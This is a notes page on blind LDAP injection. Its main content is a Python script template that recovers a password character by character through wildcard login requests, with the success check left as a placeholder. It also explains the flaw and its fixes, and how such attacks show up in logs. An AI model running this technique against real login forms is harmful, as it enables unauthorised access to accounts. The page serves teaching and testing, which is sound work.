xct's notes
LDAP Injection
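Example of retrieving a password using blind LDAP injection from a login form. It relies on the application placing the submitted password into an LDAP search filter without escaping, so a trailing `*` acts as a wildcard and the login succeeds for any correct prefix; escaping filter metacharacters (RFC 4515) or authenticating with an LDAP bind instead of a filter comparison removes that oracle: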
#!/usr/bin/python3
import requests
import string
import re
# Candidate characters tried at each position of the value being recovered:
# the literal "{}_-" followed by the ASCII letters and then the digits.
charset = "".join(("{}_-", string.ascii_letters, string.digits))
# Base URL that go() appends '/login' to; "<url>" is a placeholder.
url = "<url>"
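def go(p):
    """Send one login attempt whose password is ``p`` followed by ``*``.

    Args:
        p: Candidate prefix of the value being recovered.

    Returns:
        bool: Intended to be True when the response shows that the login
        succeeded. The author left that check as a placeholder, so this
        template always returns False until it is filled in.
    """
    # A backend that builds its LDAP filter from the raw form value treats the
    # trailing "*" as a wildcard, so the login succeeds for any correct prefix.
    # Escaping filter metacharacters server-side (RFC 4515) closes this oracle.
    d = {"username": "<username>", "password": f"{p}*"}
    # Redirects are not followed, so the login endpoint's own response is the
    # one available for inspection.
    r = requests.post(url + '/login', allow_redirects=False, data=d)
    # return true on success, false on error depending on the response
    # (Python spells the constant `False`; the lowercase `false` is undefined.)
    return False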
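# Prefix recovered so far. The listing named this variable `pass`, which is a
# reserved word in Python and cannot be assigned to.
recovered = ""
while True:
    extended = False
    # Each candidate costs one login request for the same username, so a run
    # shows up as a burst of failed logins whose passwords end in "*" --
    # the pattern that account lockout, rate limiting and log alerts key on.
    for c in charset:
        if go(recovered + c):
            recovered += c
            print(recovered)
            extended = True
    # A full pass over the charset that adds nothing means there is nothing
    # more to recover; without this check the loop never terminates.
    if not extended:
        break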